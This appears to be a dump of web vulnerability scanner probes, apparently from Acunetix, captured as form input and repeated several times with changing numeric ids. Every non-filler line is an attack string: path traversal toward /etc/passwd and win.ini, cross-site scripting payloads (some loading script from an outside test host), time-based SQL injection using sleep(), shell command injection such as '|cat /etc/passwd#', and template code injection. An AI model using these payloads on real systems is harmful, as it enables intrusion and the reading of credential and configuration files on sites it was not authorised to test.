
acu8306\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca8306

1

1

../../../../../../../../../../windows/win.ini

1

1

../../../../../../../../../../boot.ini

1

acux4780\xc0\xbez1\xc0\xbcz2a\x90bcxuca4780

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1<ScRiPt >prompt(975164)</ScRiPt>

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1<script>prompt(991816)</script>

................windowswin.ini

1

1

1<ScRiPt >prompt(935690)</ScRiPt>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?995933></ScRiPt>

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1<ScRiPt >prompt(979776)</ScRiPt>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<video><source onerror="javascript:prompt(975358)">

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

response.write(9109671*9595823)

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(959373)"></g></svg>

1

1

'+response.write(9109671*9595823)+'

1<div style=width:expression(prompt(942826))>

&cat /etc/passwd&

1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

WEB-INF/web.xml

"+response.write(9109671*9595823)+"

1

SomeCustomInjectedHeader:injected_by_wvs

1<iframe src='data:text/html

'&cat /etc/passwd&'

WEB-INF\web.xml

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

../../../../../../../../../../etc/passwd

1

1

1<body onload=prompt(913709)>

"&cat /etc/passwd&"

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

1

-1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(942206)>

1

1

SomeCustomInjectedHeader:injected_by_wvs

cat /etc/passwd

1

1

../../../../../../../../../../etc/passwd.jpg

-1)

1

1<img src=xyz OnErRor=prompt(990728)>

${100017+100160}

`cat /etc/passwd`

1

1

1

1<img/src=">" onerror=alert(967993)>

1

-1))

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

1

1

|cat /etc/passwd#

1<ScRiPt%20>prompt(942815)</sCripT>

1&n916947=v993222

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

gUGUwMmq'

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

'|'ld

1

1&lt

1

)

1

1some_inexistent_file_with_long_name%00.jpg

UDBllc6C')

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

\xf6<img acu onmouseover=prompt(963249) //\xf6>

1

"|"ld

!(()&&!|*|*|

1

0AtAxaPc'))

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1<input autofocus onfocus=prompt(942434)>

1

1

^(#$!@#$)(()))******

'"()

-1

'

1

<a href='http://www.acunetix.com'>website security</a>

testasp.vulnweb.com

/etc/passwd

http://testasp.vulnweb.com/t/xss.html?%00.jpg

'

"

-1)

1

1

1

[url=http://www.acunetix.com]website security[/url]

"

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

${@print(md5(acunetix_wvs_security_test))}

1_vrkOl <ScRiPt >prompt(926852)</ScRiPt>

1

1

-1))

1

1

||cat /etc/passwd

1

${@print(md5(acunetix_wvs_security_test))}\

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

1

Q2xIFK2L'

http://hitnyM27hCwQc.bxss.me/

&dir

acunetix_wvs_invalid_filename

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1

'&dir&'

kkfwj3Dg')

1

1

1

1

1

1

comments

"&dir&"

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

Ov29OmKY'))

|dir

file:///etc/passwd

comments

1

'"

http://www.acunetix.tst

1

1'"()&%<ScRiPt >prompt(901444)</ScRiPt>

1

1

/\../\../\../\../\../\../\../etc/passwd

'|dir

comments/.

'"()&%<ScRiPt >prompt(910642)</ScRiPt>

<!--

1

1

1

1

"|dir

WEB-INF/web.xml

1

1_903975

1

1

1

1

1

acu8827\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca8827

1

WEB-INF\web.xml

1

1

1

1

1

acux3553\xc0\xbez1\xc0\xbcz2a\x90bcxuca3553

1

../../../../../../../../../../windows/win.ini

1

1

1<ScRiPt >prompt(979366)</ScRiPt>

1

1

../../../../../../../../../../boot.ini

1

1

1<script>prompt(969881)</script>

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1<ScRiPt >prompt(906103)</ScRiPt>

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?946832></ScRiPt>

1

1

1<ScRiPt >prompt(900402)</ScRiPt>

................windowswin.ini

1

1<video><source onerror="javascript:prompt(941039)">

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(939401)"></g></svg>

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1<div style=width:expression(prompt(959734))>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1<iframe src='data:text/html

1

1

response.write(9431212*9367740)

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<body onload=prompt(927682)>

1

'+response.write(9431212*9367740)+'

&cat /etc/passwd&

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(943970)>

1

SomeCustomInjectedHeader:injected_by_wvs

1

../../../../../../../../../../etc/passwd

'&cat /etc/passwd&'

"+response.write(9431212*9367740)+"

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1<img src=xyz OnErRor=prompt(905796)>

SomeCustomInjectedHeader:injected_by_wvs

1

1

WEB-INF/web.xml

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<img/src=">" onerror=alert(949807)>

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

"&cat /etc/passwd&"

SomeCustomInjectedHeader:injected_by_wvs

1

../../../../../../../../../../etc/passwd.jpg

WEB-INF\web.xml

1

${99254+99568}

1<ScRiPt%20>prompt(992524)</sCripT>

1

cat /etc/passwd

1

-1

1

1&lt

1

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

-1)

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

`cat /etc/passwd`

\xf6<img acu onmouseover=prompt(905459) //\xf6>

1&n998795=v960333

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

)

-1))

1

|cat /etc/passwd#

1some_inexistent_file_with_long_name%00.jpg

1<input autofocus onfocus=prompt(906182)>

VSgzqbEy'

1

!(()&&!|*|*|

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

'|'ld

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

<a href='http://www.acunetix.com'>website security</a>

'"()

^(#$!@#$)(()))******

Pst1ySJq')

1

testasp.vulnweb.com

'

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

"|"ld

http://testasp.vulnweb.com/t/xss.html?%00.jpg

[url=http://www.acunetix.com]website security[/url]

1

Hox1RDVb'))

1

1

1

1_NftZ7 <ScRiPt >prompt(963407)</ScRiPt>

1

/etc/passwd

"

1

-1

1

1

1

1

1

-1)

${@print(md5(acunetix_wvs_security_test))}

1

'

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

acunetix_wvs_invalid_filename

http://hitB8dSucmG44.bxss.me/

1

1

-1))

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

"

1

1

${@print(md5(acunetix_wvs_security_test))}\

comments

SEYnLYBJ'

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1

1

comments

1

1

||cat /etc/passwd

qnqQ2El5')

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

http://www.acunetix.tst

comments/.

'"

&dir

1

1

Vp4hx5GX'))

1

file:///etc/passwd

1

1'"()&%<ScRiPt >prompt(949342)</ScRiPt>

1

1

<!--

'&dir&'

/\../\../\../\../\../\../\../etc/passwd

1

1

'"()&%<ScRiPt >prompt(936898)</ScRiPt>

1

1

1

"&dir&"

1_917201

1

1

WEB-INF/web.xml

1

1

|dir

1

acu9702\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca9702

WEB-INF\web.xml

1

1

acux8891\xc0\xbez1\xc0\xbcz2a\x90bcxuca8891

1

'|dir

1

1

../../../../../../../../../../windows/win.ini

1<ScRiPt >prompt(940652)</ScRiPt>

1

1

"|dir

1<script>prompt(944812)</script>

../../../../../../../../../../boot.ini

1

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1<ScRiPt >prompt(923510)</ScRiPt>

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?945317></ScRiPt>

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

1<ScRiPt >prompt(982736)</ScRiPt>

................windowswin.ini

1

1

1

1<video><source onerror="javascript:prompt(910164)">

1

..\..\..\..\..\..\..\..\windows\win.ini

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(961158)"></g></svg>

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1<div style=width:expression(prompt(931201))>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

response.write(9535017*9985482)

1

1<iframe src='data:text/html

1

'+response.write(9535017*9985482)+'

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<body onload=prompt(919076)>

"+response.write(9535017*9985482)+"

1

1

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

&cat /etc/passwd&

../../../../../../../../../../etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(939076)>

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

WEB-INF/web.xml

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

'&cat /etc/passwd&'

1<img src=xyz OnErRor=prompt(976099)>

1

1

SomeCustomInjectedHeader:injected_by_wvs

-1

"&cat /etc/passwd&"

../../../../../../../../../../etc/passwd.jpg

WEB-INF\web.xml

1

1<img/src=">" onerror=alert(956463)>

1

SomeCustomInjectedHeader:injected_by_wvs

-1)

1

cat /etc/passwd

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

1<ScRiPt%20>prompt(904919)</sCripT>

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

-1))

1

`cat /etc/passwd`

1

1

${99276+99615}

1

1&lt

1

1

|cat /etc/passwd#

ADMUsOq6'

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

\xf6<img acu onmouseover=prompt(977781) //\xf6>

1

1

1

1&n935367=v988828

)

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

c8XVm1UG')

'|'ld

1some_inexistent_file_with_long_name%00.jpg

1

1

1

1<input autofocus onfocus=prompt(916783)>

qltoEeYD'))

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

"|"ld

/etc/passwd

!(()&&!|*|*|

1

<a href='http://www.acunetix.com'>website security</a>

1

'"()

-1

testasp.vulnweb.com

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

^(#$!@#$)(()))******

1

1

[url=http://www.acunetix.com]website security[/url]

1

-1)

'

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1_IpZqm <ScRiPt >prompt(983478)</ScRiPt>

'

1

1

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

-1))

"

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

"

1

1

${@print(md5(acunetix_wvs_security_test))}

1

qweSkxDT'

1

1

1

http://hito7d8mUk8Jj.bxss.me/

||cat /etc/passwd

1

${@print(md5(acunetix_wvs_security_test))}\

1

acunetix_wvs_invalid_filename

1

file:///etc/passwd

FIWsckgR')

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

http://www.acunetix.tst

&dir

1

1

1

vJ7uSKr0'))

1

/\../\../\../\../\../\../\../etc/passwd

1

1

comments

WEB-INF/web.xml

1

1

'&dir&'

1

'"

1'"()&%<ScRiPt >prompt(935359)</ScRiPt>

comments

WEB-INF\web.xml

1

1

<!--

1

"&dir&"

'"()&%<ScRiPt >prompt(924716)</ScRiPt>

comments/.

1

1

../../../../../../../../../../windows/win.ini

1

1

1

1_970543

|dir

../../../../../../../../../../boot.ini

1

1

1

1

'|dir

acu3287\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca3287

1

../../../../../../../../../../windows/win.ini.jpg

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

"|dir

acux5424\xc0\xbez1\xc0\xbcz2a\x90bcxuca5424

1

1

................windowswin.ini

1<ScRiPt >prompt(966918)</ScRiPt>

1

1

1

1

1

1<script>prompt(902255)</script>

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<ScRiPt >prompt(934704)</ScRiPt>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?922694></ScRiPt>

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<ScRiPt >prompt(922805)</ScRiPt>

1

1

WEB-INF/web.xml

1<video><source onerror="javascript:prompt(949184)">

1

1

response.write(9997249*9204698)

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(931437)"></g></svg>

WEB-INF\web.xml

1

1

'+response.write(9997249*9204698)+'

&cat /etc/passwd&

1

1<div style=width:expression(prompt(913941))>

1

"+response.write(9997249*9204698)+"

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1

'&cat /etc/passwd&'

SomeCustomInjectedHeader:injected_by_wvs

1

1<iframe src='data:text/html

1

"&cat /etc/passwd&"

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

../../../../../../../../../../etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

1<body onload=prompt(902922)>

1

1

cat /etc/passwd

1

1

-1

SomeCustomInjectedHeader:injected_by_wvs

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(984715)>

1

`cat /etc/passwd`

-1)

1

1

1

../../../../../../../../../../etc/passwd.jpg

|cat /etc/passwd#

1

1<img src=xyz OnErRor=prompt(983875)>

1

-1))

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

1

uc8au2hl'

1<img/src=">" onerror=alert(976516)>

1

'|'ld

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

"|"ld

1<ScRiPt%20>prompt(910133)</sCripT>

B0AmBayJ')

1

${100097+100398}

1&n945775=v970769

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

)

1

3h9l7qxY'))

1

1&lt

1some_inexistent_file_with_long_name%00.jpg

1

!(()&&!|*|*|

1

'

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

-1

1

\xf6<img acu onmouseover=prompt(919298) //\xf6>

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

'"()

^(#$!@#$)(()))******

1

"

/etc/passwd

testasp.vulnweb.com

1<input autofocus onfocus=prompt(958416)>

1

-1)

'

||cat /etc/passwd

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

1

1

"

-1))

1

<a href='http://www.acunetix.com'>website security</a>

&dir

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

${@print(md5(acunetix_wvs_security_test))}

1

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

[url=http://www.acunetix.com]website security[/url]

'&dir&'

kIh50o0C'

1

${@print(md5(acunetix_wvs_security_test))}\

1

1

1

1

1_7jds2 <ScRiPt >prompt(984697)</ScRiPt>

1

1

"&dir&"

1

HgboOrbt')

1

acunetix_wvs_invalid_filename

1

file:///etc/passwd

http://hitXgLtLMKEtq.bxss.me/

1

1

|dir

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

YKkRLGmO'))

comments

1

1

1

/\../\../\../\../\../\../\../etc/passwd

1

'|dir

1

1

http://www.acunetix.tst

1

comments

'"

1

1

1'"()&%<ScRiPt >prompt(949831)</ScRiPt>

"|dir

WEB-INF/web.xml

1

<!--

comments/.

1

1

WEB-INF\web.xml

1

'"()&%<ScRiPt >prompt(954085)</ScRiPt>

1

1

1

1

1

../../../../../../../../../../windows/win.ini

1

1

1

1_987240

1

1

../../../../../../../../../../boot.ini

1

1

1

1

acu5714\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca5714

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1

acux5131\xc0\xbez1\xc0\xbcz2a\x90bcxuca5131

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

1

................windowswin.ini

1<ScRiPt >prompt(970251)</ScRiPt>

1

1

1

1

1<script>prompt(951651)</script>

..\..\..\..\..\..\..\..\windows\win.ini

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<ScRiPt >prompt(902334)</ScRiPt>

1

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?939446></ScRiPt>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<ScRiPt >prompt(936988)</ScRiPt>

1

1

1<video><source onerror="javascript:prompt(957165)">

response.write(9950413*9645485)

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(929912)"></g></svg>

1

WEB-INF/web.xml

1

'+response.write(9950413*9645485)+'

SomeCustomInjectedHeader:injected_by_wvs

&cat /etc/passwd&

1<div style=width:expression(prompt(912483))>

1

1

WEB-INF\web.xml

SomeCustomInjectedHeader:injected_by_wvs

"+response.write(9950413*9645485)+"

1<iframe src='data:text/html

../../../../../../../../../../etc/passwd

'&cat /etc/passwd&'

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1

1

"&cat /etc/passwd&"

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<body onload=prompt(933367)>

1

1

1

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

1

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(945957)>

../../../../../../../../../../etc/passwd.jpg

cat /etc/passwd

1

-1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

${100132+99049}

1

1&n948868=v922195

1<img src=xyz OnErRor=prompt(916913)>

1

-1)

`cat /etc/passwd`

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1some_inexistent_file_with_long_name%00.jpg

1<img/src=">" onerror=alert(955349)>

1

)

1

1

-1))

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

|cat /etc/passwd#

1<ScRiPt%20>prompt(932917)</sCripT>

OyGqa2Tr'

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

!(()&&!|*|*|

testasp.vulnweb.com

1&lt

'"()

'|'ld

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

6NmdNYPA')

1

1

'

^(#$!@#$)(()))******

\xf6<img acu onmouseover=prompt(998189) //\xf6>

1

1

Z0kZjNym'))

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

"|"ld

1

1<input autofocus onfocus=prompt(958961)>

"

1

1

1

/etc/passwd

acunetix_wvs_invalid_filename

-1

http://hitAriWvK0HkZ.bxss.me/

<a href='http://www.acunetix.com'>website security</a>

1

1

${@print(md5(acunetix_wvs_security_test))}

1

'

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

[url=http://www.acunetix.com]website security[/url]

-1)

comments

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

${@print(md5(acunetix_wvs_security_test))}\

1

"

1

1

comments

1_ZZUp8 <ScRiPt >prompt(915495)</ScRiPt>

1

-1))

1

http://www.acunetix.tst

||cat /etc/passwd

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

DKLX0RNA'

1

1

comments/.

1

'"

1

&dir

esAFs4bR')

1

1'"()&%<ScRiPt >prompt(958932)</ScRiPt>

1

1

1

file:///etc/passwd

1

2z4A7ZW5'))

'&dir&'

<!--

/\../\../\../\../\../\../\../etc/passwd

1

1

1

'"()&%<ScRiPt >prompt(968700)</ScRiPt>

1

1

"&dir&"

1

WEB-INF/web.xml

1_955111

1

1

|dir

1

WEB-INF\web.xml

1

1

acu2358\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca2358

1

'|dir

../../../../../../../../../../windows/win.ini

1

acux2008\xc0\xbez1\xc0\xbcz2a\x90bcxuca2008

1

1

"|dir

1

../../../../../../../../../../boot.ini

1<ScRiPt >prompt(914554)</ScRiPt>

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1<script>prompt(918828)</script>

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1<ScRiPt >prompt(978810)</ScRiPt>

1

1

1

................windowswin.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?935605></ScRiPt>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<ScRiPt >prompt(920345)</ScRiPt>

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<video><source onerror="javascript:prompt(989174)">

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(969109)"></g></svg>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

response.write(9729206*9202420)

1

1

1<div style=width:expression(prompt(918671))>

1

'+response.write(9729206*9202420)+'

1

1

&cat /etc/passwd&

SomeCustomInjectedHeader:injected_by_wvs

WEB-INF/web.xml

"+response.write(9729206*9202420)+"

1<iframe src='data:text/html

1

../../../../../../../../../../etc/passwd

WEB-INF\web.xml

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

SomeCustomInjectedHeader:injected_by_wvs

'&cat /etc/passwd&'

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1<body onload=prompt(921072)>

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

1

1

../../../../../../../../../../etc/passwd.jpg

-1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(927924)>

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

cat /etc/passwd

1

1

1

1<img src=xyz OnErRor=prompt(965725)>

-1)

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

`cat /etc/passwd`

1

${99265+99349}

1

-1))

1<img/src=">" onerror=alert(943384)>

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1

1

1

|cat /etc/passwd#

c9YFM719'

1&n982402=v964403

1some_inexistent_file_with_long_name%00.jpg

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1<ScRiPt%20>prompt(945288)</sCripT>

)

ukqGkiFn')

'|'ld

1

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

!(()&&!|*|*|

1&lt

/etc/passwd

1

FHFBTM8Q'))

1

testasp.vulnweb.com

1

"|"ld

^(#$!@#$)(()))******

-1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

\xf6<img acu onmouseover=prompt(919835) //\xf6>

1

1

'"()

1

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1<input autofocus onfocus=prompt(977720)>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

-1)

'

1

1

1

'

1

1

"

1

-1))

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

<a href='http://www.acunetix.com'>website security</a>

1

1

"

1

1

${@print(md5(acunetix_wvs_security_test))}

[url=http://www.acunetix.com]website security[/url]

iFS0kO3c'

http://hitoX6vpuX4Ii.bxss.me/

1

${@print(md5(acunetix_wvs_security_test))}\

1

||cat /etc/passwd

1

acunetix_wvs_invalid_filename

1_qSt5G <ScRiPt >prompt(969913)</ScRiPt>

1

JuoWlVIZ')

1

file:///etc/passwd

1

comments

1

1

&dir

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

'"

/\../\../\../\../\../\../\../etc/passwd

http://www.acunetix.tst

